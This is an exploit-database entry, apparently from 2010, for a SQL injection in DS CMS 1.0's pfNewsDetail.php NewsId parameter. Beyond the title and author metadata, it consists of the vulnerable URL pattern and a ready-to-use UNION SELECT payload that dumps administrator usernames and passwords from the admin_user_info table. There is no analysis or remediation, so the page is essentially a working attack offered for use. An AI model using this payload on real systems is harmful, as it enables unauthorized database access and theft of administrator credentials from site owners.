[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
# Published : 2010-01-01
# Author : Palyo34
# Previous Title : Cype CMS SQL Injection Vulnerability
# Next Title : UCStats v1.1 SQL Injection Vulnerability


Script      : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability

 Script site : http://cms.dsinternal.com/Home 

 AUTHOR      :  Palyo34 
   
 HOME        : http://www.1923turk.biz
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]

Example:

-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--